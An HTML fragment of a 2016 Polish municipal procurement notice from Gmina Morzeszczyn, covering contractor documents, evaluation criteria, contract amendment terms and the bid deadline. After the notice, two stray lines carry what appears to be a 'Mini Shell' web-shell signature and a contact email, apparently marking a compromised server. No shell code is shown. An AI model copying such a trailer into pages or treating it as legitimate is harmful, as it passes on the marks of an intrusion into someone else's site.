<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty 2. Kosztorys ofertowy. 3. Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy - Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania     
     istotnych zmian zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru   
     Wykonawcy. Zamawiający  przewiduje możliwość zmiany postanowień zawartej umowy  w stosunku do  
     treści oferty w określonych warunkach możliwości dokonania zmian :
  -  zmiana regulacji prawnych w stosunku do powszechnie obowiązujących przepisów prawa (np. urzędowa  
     zmiana stawki  podatku VAT)
  -  konieczności zmiany terminu realizacji
  -  działaniem siły wyższej w rozumieniu przepisów k.c. w związku z powstaniem okoliczności wynikających z    
     przyczyn niezależnych od Zamawiającego  tj. technicznych , gospodarczych i finansowych
  -  z przyczyn których wcześniej nie można było przewidzieć a wykonanie  umowy  
     nie leży w  interesie publicznym umowy,  Zamawiający może odstąpić od umowy w terminie 30 dni od 
     powzięcia wiadomości o tych okolicznościach tj.
         -  jeżeli zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
         -  jeżeli zostanie wydany nakaz zajęcia majątku Wykonawcy, 
         -  jeżeli Wykonawca przerwał roboty bez podania przyczyny i uzasadnienia           
       5. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana 
nr rachunku bankowego),
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.morzeszczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Morzeszczyn
ul. 22 Lipca 4
83-132 Morzeszczyn
pok. 13 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2016 godzina 10:00, miejsce: Urząd Gminy Morzeszczyn
ul. 22 Lipca 4
83-132 Morzeszczyn
pok. 10  I piętro  Sekretariat UG.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com